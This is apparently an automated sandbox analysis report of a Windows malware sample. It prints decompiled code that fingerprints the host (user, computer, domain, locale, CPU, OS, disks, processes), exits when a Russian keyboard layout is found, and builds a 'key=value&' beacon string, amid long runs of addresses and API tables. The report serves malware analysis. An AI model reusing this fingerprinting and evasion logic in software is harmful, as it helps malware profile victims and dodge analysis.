						_t277 = 1;
						_v24 = 1;
						do {
							wsprintfW(_v8, L"%d", _t277);
							_t281 = _t281 + 0xc;
							_v16 = 0;
							_t277 = _t277 + 1;
							if(RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12) != 0) {
								L27:
								_t230 = 0;
								_v24 = 0;
								goto L28;
							}
							_v28 = 0x80;
							if(RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28) != 0) {
								GetLastError();
							} else {
								_v16 = 1;
							}
							RegCloseKey(_v12);
							if(_v16 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v20, L"00000419") == 0) {
									_t218 = wsprintfW( *(_t279 + 0x44), "1");
									_t281 = _t281 + 8;
									ExitProcess(0);
								}
								_t230 = _v24;
							}
							L28:
						} while (_t277 != 9 && _t230 != 0);
						wsprintfW( *(_t279 + 0x44), "0");
						_t281 = _t281 + 8;
						VirtualFree(_v8, 0, 0x8000);
						goto L31;
					}
					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4);
					_v20 = _t238;
					 *(_t279 + 0x38) = _t238;
					_v12 = 0;
					if(RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8) != 0) {
						L17:
						 *(_t279 + 0x30) = 0;
						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v24 = 0x40;
					if(RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24) != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v8);
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t279 + 0x20) = _t246;
					if(_t246 == 0) {
						goto L11;
					}
					_push(_t260);
					_t247 = E0F9D72B0(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
					if(_t247 == 0) {
						wsprintfW( *(_t279 + 0x20), L"undefined");
						L10:
						_t281 = _t281 + 8;
						goto L11;
					}
					_t249 =  *(_t279 + 0x20);
					if( *_t249 != 0) {
						goto L11;
					}
					wsprintfW(_t249, L"WORKGROUP");
					goto L10;
				}
			}



























































                                        0x0f9d7330
                                        0x0f9d7330
                                        0x0f9d733b
                                        0x0f9d7347
                                        0x0f9d7357
                                        0x0f9d7359
                                        0x0f9d735c
                                        0x0f9d7361
                                        0x0f9d7368
                                        0x0f9d7368
                                        0x0f9d7372
                                        0x0f9d737f
                                        0x0f9d7386
                                        0x0f9d7388
                                        0x0f9d738b
                                        0x0f9d7390
                                        0x0f9d7390
                                        0x0f9d73a0
                                        0x0f9d73f6
                                        0x0f9d73fa
                                        0x0f9d7495
                                        0x0f9d7499
                                        0x0f9d7599
                                        0x0f9d759d
                                        0x0f9d75ad
                                        0x0f9d75af
                                        0x0f9d75c5
                                        0x0f9d75cf
                                        0x0f9d75d1
                                        0x0f9d75e9
                                        0x0f9d75f6
                                        0x0f9d75f8
                                        0x0f9d75f8
                                        0x0f9d75cf
                                        0x0f9d75ff
                                        0x0f9d766e
                                        0x0f9d7672
                                        0x0f9d7677
                                        0x0f9d7683
                                        0x0f9d768a
                                        0x0f9d768c
                                        0x0f9d768c
                                        0x0f9d768a
                                        0x0f9d7693
                                        0x0f9d76a7
                                        0x0f9d76b7
                                        0x0f9d76ba
                                        0x0f9d76bc
                                        0x0f9d76c4
                                        0x0f9d76cc
                                        0x0f9d76cc
                                        0x0f9d76d7
                                        0x0f9d76db
                                        0x0f9d76e2
                                        0x0f9d76e9
                                        0x0f9d76f6
                                        0x0f9d76fe
                                        0x0f9d7704
                                        0x0f9d770a
                                        0x0f9d770a
                                        0x0f9d7720
                                        0x0f9d7727
                                        0x0f9d7729
                                        0x0f9d7730
                                        0x0f9d7736
                                        0x0f9d7736
                                        0x0f9d773c
                                        0x0f9d7755
                                        0x0f9d7755
                                        0x0f9d7768
                                        0x0f9d7770
                                        0x0f9d7776
                                        0x0f9d777d
                                        0x0f9d7790
                                        0x0f9d7796
                                        0x0f9d779b
                                        0x0f9d77b9
                                        0x0f9d779d
                                        0x0f9d77b4
                                        0x0f9d77b4
                                        0x0f9d77ce
                                        0x0f9d77d1
                                        0x0f9d77d1
                                        0x0f9d77e3
                                        0x0f9d7992
                                        0x0f9d7999
                                        0x0f9d79e2
                                        0x0f9d79eb
                                        0x0f9d79eb
                                        0x0f9d79a9
                                        0x0f9d79af
                                        0x0f9d79b7
                                        0x0f9d79d6
                                        0x0f9d79d6
                                        0x00000000
                                        0x0f9d79d6
                                        0x0f9d79b9
                                        0x0f9d79bb
                                        0x0f9d79c2
                                        0x00000000
                                        0x00000000
                                        0x0f9d79d0
                                        0x00000000
                                        0x0f9d77e9
                                        0x0f9d77f7
                                        0x0f9d77fe
                                        0x0f9d7805
                                        0x0f9d780c
                                        0x0f9d7813
                                        0x0f9d781a
                                        0x0f9d7821
                                        0x0f9d782e
                                        0x0f9d7831
                                        0x0f9d7834
                                        0x0f9d7840
                                        0x0f9d7840
                                        0x0f9d7843
                                        0x0f9d7846
                                        0x0f9d7847
                                        0x0f9d784d
                                        0x0f9d7852
                                        0x0f9d7855
                                        0x0f9d785a
                                        0x0f9d785d
                                        0x0f9d785f
                                        0x0f9d7862
                                        0x0f9d7867
                                        0x0f9d7875
                                        0x0f9d787a
                                        0x0f9d788b
                                        0x0f9d7896
                                        0x0f9d78a4
                                        0x0f9d78a8
                                        0x0f9d78b2
                                        0x0f9d78d0
                                        0x0f9d796b
                                        0x00000000
                                        0x0f9d796b
                                        0x0f9d78f2
                                        0x0f9d78f5
                                        0x0f9d78f7
                                        0x0f9d78fc
                                        0x0f9d7908
                                        0x0f9d790b
                                        0x0f9d790d
                                        0x0f9d7910
                                        0x0f9d7919
                                        0x0f9d792a
                                        0x0f9d7938
                                        0x0f9d793a
                                        0x0f9d794c
                                        0x0f9d7954
                                        0x0f9d795f
                                        0x0f9d795f
                                        0x0f9d7976
                                        0x0f9d7977
                                        0x0f9d797a
                                        0x0f9d7986
                                        0x0f9d7988
                                        0x0f9d798d
                                        0x00000000
                                        0x0f9d798d
                                        0x0f9d7601
                                        0x0f9d7605
                                        0x0f9d7616
                                        0x0f9d7618
                                        0x0f9d761c
                                        0x0f9d7622
                                        0x0f9d7663
                                        0x0f9d7663
                                        0x0f9d7668
                                        0x0f9d7669
                                        0x0f9d766b
                                        0x00000000
                                        0x0f9d766b
                                        0x0f9d7624
                                        0x0f9d762b
                                        0x00000000
                                        0x0f9d765c
                                        0x00000000
                                        0x00000000
                                        0x0f9d764e
                                        0x00000000
                                        0x00000000
                                        0x0f9d7655
                                        0x00000000
                                        0x00000000
                                        0x0f9d7647
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d762b
                                        0x0f9d75ff
                                        0x0f9d74ad
                                        0x0f9d74b6
                                        0x0f9d74c0
                                        0x0f9d74c5
                                        0x0f9d74c8
                                        0x0f9d74cd
                                        0x0f9d74d4
                                        0x0f9d74dd
                                        0x0f9d74df
                                        0x0f9d74e2
                                        0x0f9d74ec
                                        0x0f9d7507
                                        0x0f9d7564
                                        0x0f9d7564
                                        0x0f9d7566
                                        0x00000000
                                        0x0f9d7566
                                        0x0f9d750c
                                        0x0f9d7529
                                        0x0f9d7534
                                        0x0f9d752b
                                        0x0f9d752b
                                        0x0f9d752b
                                        0x0f9d753d
                                        0x0f9d7547
                                        0x00000000
                                        0x0f9d7549
                                        0x0f9d7559
                                        0x0f9d763a
                                        0x0f9d763c
                                        0x0f9d7641
                                        0x0f9d7641
                                        0x0f9d755f
                                        0x0f9d755f
                                        0x0f9d7569
                                        0x0f9d7569
                                        0x0f9d757e
                                        0x0f9d7580
                                        0x0f9d758d
                                        0x00000000
                                        0x0f9d7593
                                        0x0f9d740e
                                        0x0f9d7410
                                        0x0f9d7413
                                        0x0f9d742b
                                        0x0f9d743a
                                        0x0f9d747e
                                        0x0f9d7488
                                        0x0f9d748f
                                        0x00000000
                                        0x0f9d748f
                                        0x0f9d743f
                                        0x0f9d745e
                                        0x0f9d7469
                                        0x0f9d7460
                                        0x0f9d7460
                                        0x0f9d7460
                                        0x0f9d7472
                                        0x0f9d747c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d73a2
                                        0x0f9d73b0
                                        0x0f9d73b2
                                        0x0f9d73b7
                                        0x00000000
                                        0x00000000
                                        0x0f9d73b9
                                        0x0f9d73cf
                                        0x0f9d73d6
                                        0x0f9d73f1
                                        0x0f9d73f1
                                        0x0f9d73f3
                                        0x00000000
                                        0x0f9d73f3
                                        0x0f9d73d8
                                        0x0f9d73df
                                        0x00000000
                                        0x00000000
                                        0x0f9d73f1
                                        0x00000000
                                        0x0f9d73f1

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F9D7357
                                        • GetUserNameW.ADVAPI32(00000000,?), ref: 0F9D7368
                                        • VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F9D7386
                                        • GetComputerNameW.KERNEL32 ref: 0F9D7390
                                        • VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F9D73B0
                                        • wsprintfW.USER32 ref: 0F9D73F1
                                        • VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F9D740E
                                        • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F9D7432
                                        • RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0F9D4640,?), ref: 0F9D7456
                                        • GetLastError.KERNEL32 ref: 0F9D7469
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0F9D7472
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D748F
                                        • VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 0F9D74AD
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F9D74C3
                                        • wsprintfW.USER32 ref: 0F9D74DD
                                        • RegOpenKeyExW.ADVAPI32(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0F9D74FF
                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,0F9D4640,?), ref: 0F9D7521
                                        • GetLastError.KERNEL32 ref: 0F9D7534
                                        • RegCloseKey.ADVAPI32(?), ref: 0F9D753D
                                        • lstrcmpiW.KERNEL32(0F9D4640,00000419), ref: 0F9D7551
                                        • wsprintfW.USER32 ref: 0F9D757E
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D758D
                                        • VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0F9D75AD
                                        • wsprintfW.USER32 ref: 0F9D75F6
                                        • GetNativeSystemInfo.KERNEL32(?), ref: 0F9D7605
                                        • VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 0F9D7616
                                        • wsprintfW.USER32 ref: 0F9D763A
                                        • ExitProcess.KERNEL32 ref: 0F9D7641
                                        • wsprintfW.USER32 ref: 0F9D7669
                                        • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0F9D76A7
                                        • VirtualAlloc.KERNELBASE(00000000,00000E0C,00003000,00000004), ref: 0F9D76BA
                                        • GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0F9D76C4
                                        • GetVolumeInformationW.KERNELBASE(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0F9D76FE
                                        • lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D7730
                                        • wsprintfW.USER32 ref: 0F9D7768
                                        • lstrcatW.KERNEL32(?,0000060C), ref: 0F9D777D
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0F9D7789
                                        • GetProcAddress.KERNEL32(00000000), ref: 0F9D7790
                                        • lstrlenW.KERNEL32(?), ref: 0F9D77A0
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F9D77D1
                                          • Part of subcall function 0F9D7A10: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0F9D7A2D
                                          • Part of subcall function 0F9D7A10: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F9D7AA1
                                          • Part of subcall function 0F9D7A10: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F9D7AB6
                                          • Part of subcall function 0F9D7A10: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D7ACC
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F9D7828
                                        • GetDriveTypeW.KERNEL32(?), ref: 0F9D786F
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7896
                                        • lstrcatW.KERNEL32(?,0F9E029C), ref: 0F9D78A8
                                        • lstrcatW.KERNEL32(?,0F9E0310), ref: 0F9D78B2
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,0F9D4640,?,00000000), ref: 0F9D78C8
                                        • lstrlenW.KERNEL32(?,?,00000000,0F9D4640,00000000,00000000,00000000,0F9D4640,00000000), ref: 0F9D7910
                                        • wsprintfW.USER32 ref: 0F9D792A
                                        • lstrlenW.KERNEL32(?), ref: 0F9D7938
                                        • wsprintfW.USER32 ref: 0F9D794C
                                        • lstrcatW.KERNEL32(?,0F9E0330), ref: 0F9D795F
                                        • lstrcatW.KERNEL32(?,0F9E0334), ref: 0F9D796B
                                        • lstrlenW.KERNEL32(?), ref: 0F9D7986
                                        • VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 0F9D79A9
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000), ref: 0F9D79D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
                                        • String ID: %I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
                                        • API String ID: 153366582-983031137
                                        • Opcode ID: 8d22d35a7f791f371599a240d171b864445a980667e64b03444b5a69ce305f9b
                                        • Instruction ID: 87f46a052380e17a54fa27737a3d91d83e7b1d83710cb35672e6a63a3a4e77ad
                                        • Opcode Fuzzy Hash: 8d22d35a7f791f371599a240d171b864445a980667e64b03444b5a69ce305f9b
                                        • Instruction Fuzzy Hash: C112BE70A40305AFEB218FA0CC46FAEBBB8FF44705F208518F741A61E2D7B5A964CB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6F40 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196stringmemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0F9D6F40(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}







                                        0x0f9d6f44
                                        0x0f9d6f47
                                        0x0f9d6f58
                                        0x0f9d6f61
                                        0x0f9d6f69
                                        0x0f9d6f72
                                        0x0f9d6f7a
                                        0x0f9d6f7a
                                        0x0f9d6f7f
                                        0x0f9d6f85
                                        0x0f9d6f8d
                                        0x0f9d6f93
                                        0x0f9d6f9b
                                        0x0f9d6f9b
                                        0x0f9d6fa1
                                        0x0f9d6fa7
                                        0x0f9d6faf
                                        0x0f9d6fb5
                                        0x0f9d6fbd
                                        0x0f9d6fbd
                                        0x0f9d6fc3
                                        0x0f9d6fc9
                                        0x0f9d6fd1
                                        0x0f9d6fd7
                                        0x0f9d6fdf
                                        0x0f9d6fdf
                                        0x0f9d6fe5
                                        0x0f9d6feb
                                        0x0f9d6ff3
                                        0x0f9d6ff9
                                        0x0f9d7001
                                        0x0f9d7001
                                        0x0f9d7007
                                        0x0f9d700d
                                        0x0f9d7015
                                        0x0f9d701b
                                        0x0f9d7023
                                        0x0f9d7023
                                        0x0f9d7029
                                        0x0f9d702f
                                        0x0f9d7037
                                        0x0f9d703d
                                        0x0f9d7045
                                        0x0f9d7045
                                        0x0f9d704b
                                        0x0f9d7051
                                        0x0f9d7059
                                        0x0f9d705f
                                        0x0f9d7067
                                        0x0f9d7067
                                        0x0f9d706d
                                        0x0f9d7073
                                        0x0f9d707b
                                        0x0f9d7081
                                        0x0f9d7089
                                        0x0f9d7089
                                        0x0f9d708f
                                        0x0f9d709c
                                        0x0f9d70a2
                                        0x0f9d70a5
                                        0x0f9d70aa
                                        0x0f9d70c7
                                        0x0f9d70ac
                                        0x0f9d70b6
                                        0x0f9d70bc
                                        0x0f9d70d4
                                        0x0f9d70dc
                                        0x0f9d70e2
                                        0x0f9d70ea
                                        0x0f9d70f6
                                        0x0f9d70f6
                                        0x0f9d7100
                                        0x0f9d7106
                                        0x0f9d710e
                                        0x0f9d7114
                                        0x0f9d711c
                                        0x0f9d711c
                                        0x0f9d7128
                                        0x0f9d7132

                                        APIs
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6F61
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6F69
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6F72
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D6F7A
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6F85
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6F8D
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6F93
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D6F9B
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FA7
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6FAF
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FB5
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D6FBD
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FC9
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6FD1
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FD7
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D6FDF
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FEB
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6FF3
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FF9
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7001
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D700D
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D7015
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D701B
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7023
                                        • lstrcatW.KERNEL32(?,0F9D4966), ref: 0F9D702F
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D7037
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D703D
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7045
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7051
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D7059
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D705F
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7067
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7073
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D707B
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7081
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7089
                                        • VirtualAlloc.KERNELBASE(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0F9D4699,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0F9D709C
                                        • wsprintfW.USER32 ref: 0F9D70B6
                                        • wsprintfW.USER32 ref: 0F9D70C7
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D70D4
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D70DC
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D70E2
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D70EA
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F9D70F6
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7106
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D710E
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7114
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D711C
                                        • lstrlenW.KERNEL32(?,00000000,00000000,?,?,0F9D4699,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D711F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
                                        • String ID: %x%x$undefined
                                        • API String ID: 3872469520-3801831566
                                        • Opcode ID: f222761f4124e5e41ce50eba9895cdc82a3febf678536e779fec42ecabd81e0d
                                        • Instruction ID: 50238e5268f9147d1b3f3daddc1a401e90855ba7c8e95b1c6fec1adecca871f2
                                        • Opcode Fuzzy Hash: f222761f4124e5e41ce50eba9895cdc82a3febf678536e779fec42ecabd81e0d
                                        • Instruction Fuzzy Hash: E9518330106654B6DB233F6ACC4AFDF3A1CEFC6304F158050FB152419B8B699256DFAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D4600 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83stringmemorysynchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0F9D39F0: GetProcessHeap.KERNEL32(?,?,0F9D4637,00000000,?,00000000,00000000), ref: 0F9D3A8C
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F9D7357
                                          • Part of subcall function 0F9D7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0F9D7368
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F9D7386
                                          • Part of subcall function 0F9D7330: GetComputerNameW.KERNEL32 ref: 0F9D7390
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F9D73B0
                                          • Part of subcall function 0F9D7330: wsprintfW.USER32 ref: 0F9D73F1
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F9D740E
                                          • Part of subcall function 0F9D7330: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F9D7432
                                          • Part of subcall function 0F9D7330: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0F9D4640,?), ref: 0F9D7456
                                          • Part of subcall function 0F9D7330: RegCloseKey.ADVAPI32(00000000), ref: 0F9D7472
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7192
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D719D
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71B3
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71BE
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71D4
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71DF
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71F5
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(0F9D4966,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7200
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7216
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7221
